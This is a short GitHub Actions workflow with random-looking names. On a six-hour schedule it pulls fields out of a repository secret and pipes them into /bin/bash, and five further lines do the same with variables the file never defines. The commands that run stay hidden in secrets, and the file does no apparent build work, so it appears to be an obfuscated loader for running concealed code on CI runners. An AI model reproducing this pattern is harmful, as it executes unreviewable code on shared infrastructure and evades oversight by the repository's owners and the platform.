name: ellipticalparagraph
on:
  workflow_dispatch:
  schedule:
    - cron: '33 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: ellipticalparagraph
        env:
          agkh50: ${{ secrets.agkh50 }}
        run: |
          echo $agkh50 | jq -r .mrcj47001 | /bin/bash
          echo $qnd00812 | jq -r .op4 | /bin/bash
          echo $jv92 | jq -r .zlef9 | /bin/bash
          echo $ymi2551 | jq -r .fs2495 | /bin/bash
          echo $jx66 | jq -r .ur48 | /bin/bash
          echo $py9337 | jq -r .r86 | /bin/bash

